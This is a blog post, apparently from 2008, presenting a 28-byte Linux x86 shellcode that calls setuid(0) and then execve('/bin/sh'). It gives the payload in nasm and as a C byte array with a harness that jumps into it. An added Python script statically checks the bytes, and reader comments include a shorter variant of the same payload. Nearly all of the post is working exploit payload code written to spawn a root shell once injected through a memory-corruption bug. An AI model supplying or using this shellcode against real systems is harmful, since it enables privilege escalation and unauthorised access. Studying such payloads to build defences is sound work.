Smallest GNU/Linux x86 setuid(0) & exec("/bin/sh",0,0) Stable shellcode – 28 bytes
November 26th, 2008
After all the work we had done, vlan7 warned me that the previous shellcodes we had been working on were written wrongly: both of us were putting the uid for the setuid call in the ecx register instead of ebx.... An unforgivable mistake, no doubt about it.
So, after thinking it over carefully, reworking the shellcode and testing it in different environments (modifying the stack, the registers, etc.), I have arrived at this stable 28-byte shellcode that performs both calls, setuid & execve, correctly:
Code for nasm:
global _start
section .text
_start:
        ; setuid(0): eax = 23 (__NR_setuid), ebx = uid = 0
        xor ebx,ebx             ; ebx = 0 (the uid argument)
        lea eax,[ebx+17h]       ; eax = 0 + 0x17 = 23, no NUL bytes in the encoding
        cdq                     ; edx = 0 (sign-extends eax, which is positive)
        int 80h
        ; execve("/bin/sh", 0, 0): eax = 11 (__NR_execve), ebx = path, ecx = argv, edx = envp
        xor ecx,ecx             ; ecx = 0, used both as argv and as the NUL terminator
        push ecx                ; NUL terminator for the string
        push 0x68732f6e         ; "n/sh"
        push 0x69622f2f         ; "//bi"  -> stack now holds "//bin/sh\0"
        lea eax,[ecx+0Bh]       ; eax = 0 + 0x0b = 11
        mov ebx,esp             ; ebx -> "//bin/sh"; edx is still 0 from cdq
        int 80h
Code in C:
#include <stdio.h>

/* The 28 bytes from the nasm listing above, one instruction per line. */
const char shellcode[] =
    "\x31\xdb"              /* xor ebx,ebx                        */
    "\x8d\x43\x17"          /* lea eax,[ebx+0x17]  ; 23 = setuid  */
    "\x99"                  /* cdq                                */
    "\xcd\x80"              /* int 0x80                           */
    "\x31\xc9"              /* xor ecx,ecx                        */
    "\x51"                  /* push ecx  (NUL terminator)         */
    "\x68\x6e\x2f\x73\x68"  /* push "n/sh"                        */
    "\x68\x2f\x2f\x62\x69"  /* push "//bi"                        */
    "\x8d\x41\x0b"          /* lea eax,[ecx+0x0b]  ; 11 = execve  */
    "\x89\xe3"              /* mov ebx,esp                        */
    "\xcd\x80";             /* int 0x80                           */

int main(void)
{
    printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE "
           "WITHOUT NULLS THAT SPAWNS A SHELL"
           "\n\nCoded by Chema Garcia (aka sch3m4)"
           "\n\t + sch3m4@opensec.es"
           "\n\t + http://opensec.es"
           "\n\n[+] Date: 29/11/2008"
           "\n[+] Thanks to: vlan7"
           "\n\n[+] Shellcode Size: %d bytes\n\n",
           (int)(sizeof(shellcode) - 1));   /* -1: drop the C string's own NUL */

    /* Jump straight into the byte array. This only works if the page holding
       the array is executable; with NX enforced (the default on current
       toolchains) the call faults unless the bytes sit in an executable mapping. */
    (*(void (*)(void)) shellcode)();
    return 0;
}
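The properties the post claims for this sequence (28 bytes, no NUL bytes, setuid then execve, the path built on the stack) can be checked from the bytes alone. The following Python script is an added example, not code from the post or from sch3m4: it transcribes the byte array above, looks for every int 0x80 gate, decodes the eax load that precedes it (the lea eax,[reg+disp8] idiom used here, plus the push byte imm8 / pop eax idiom), and reassembles the string left on the stack by consecutive push imm32 instructions. The function names and the small syscall table are mine; the syscall numbers are the standard i386 ones.

```python
"""Static sanity checks for a raw x86-32 Linux shellcode blob.

This is a linear pattern matcher for the idioms used in the post, not a
disassembler: it does not follow branches and it only knows a handful of
opcodes, so use it to verify a listing you already understand.
"""

# i386 syscall numbers relevant here (asm/unistd_32.h).
I386_SYSCALLS = {1: "exit", 3: "read", 4: "write", 11: "execve", 23: "setuid"}

# The 28-byte sequence from the post, transcribed from its C array.
POST_SHELLCODE = bytes.fromhex(
    "31db"        # xor ebx,ebx
    "8d4317"      # lea eax,[ebx+0x17]   ; 23 = setuid
    "99"          # cdq
    "cd80"        # int 0x80
    "31c9"        # xor ecx,ecx
    "51"          # push ecx             ; NUL terminator
    "686e2f7368"  # push 0x68732f6e      ; "n/sh"
    "682f2f6269"  # push 0x69622f2f      ; "//bi"
    "8d410b"      # lea eax,[ecx+0x0b]   ; 11 = execve
    "89e3"        # mov ebx,esp
    "cd80"        # int 0x80
)


def has_nul(code: bytes) -> bool:
    """True if the blob contains a 0x00 byte (it would truncate a C string)."""
    return b"\x00" in code


def syscall_gates(code: bytes) -> list:
    """Offsets of every `int 0x80` (cd 80) in the blob."""
    return [i for i in range(len(code) - 1) if code[i:i + 2] == b"\xcd\x80"]


def syscall_numbers(code: bytes) -> list:
    """For each int 0x80, report (offset, eax value, syscall name) using the
    last recognised eax load seen before it. Recognised loads:
      8d 43 xx  lea eax,[ebx+xx]     8d 41 xx  lea eax,[ecx+xx]
      6a xx 58  push byte xx ; pop eax
    `push imm32` (68 xx xx xx xx) is skipped whole so its immediate is never
    mistaken for opcodes. eax is None if no load was recognised."""
    result = []
    last = None
    i = 0
    while i < len(code):
        b = code[i]
        if b == 0x8D and i + 2 < len(code) and code[i + 1] in (0x43, 0x41):
            last = code[i + 2]
            i += 3
        elif b == 0x6A and i + 2 < len(code) and code[i + 2] == 0x58:
            last = code[i + 1]
            i += 3
        elif b == 0x68:
            i += 5
        elif b == 0xCD and i + 1 < len(code) and code[i + 1] == 0x80:
            result.append((i, last, I386_SYSCALLS.get(last, "?")))
            i += 2
        else:
            i += 1
    return result


def stack_string(code: bytes) -> str:
    """Reassemble the string that consecutive `push imm32` leave on the stack.
    The stack grows downwards, so the last push ends up at the lowest address
    and is therefore the start of the string; each immediate is already in
    memory (little-endian) order."""
    chunks = []
    i = 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            chunks.append(code[i + 1:i + 5])
            i += 5
        else:
            i += 1
    return b"".join(reversed(chunks)).decode("ascii", errors="replace")


def report(code: bytes) -> dict:
    """Bundle the checks above for one blob."""
    return {
        "size": len(code),
        "has_nul": has_nul(code),
        "syscalls": syscall_numbers(code),
        "stack_string": stack_string(code),
    }


if __name__ == "__main__":
    r = report(POST_SHELLCODE)
    print(f"size={r['size']} nul={r['has_nul']} string={r['stack_string']!r}")
    for off, num, name in r["syscalls"]:
        print(f"  int 0x80 at offset {off}: eax={num} ({name})")
```

Run as-is it reports 28 bytes, no NUL, setuid at offset 6 and execve at offset 26, and the stack string "//bin/sh" (the doubled slash is what lets the path fit in exactly two dwords without a NUL; the terminator comes from the push ecx that precedes it).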

I am very impressed with the article I have just read. I wish the writer of opensec.es can continue to provide so much worthwhile information and unforgettable experience to opensec.es readers. There is not much to state except the following universal truth: A person who says something is impossible is usually interrupted by the person doing it. I will be back.
Wouldn’t:
bits 32
global _start
section .text
_start:
xor ebx,ebx
push byte 23
runit:
pop eax
cdq
int 0x80
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
mov ebx,esp
push byte 11
jmp short runit
be one byte shorter?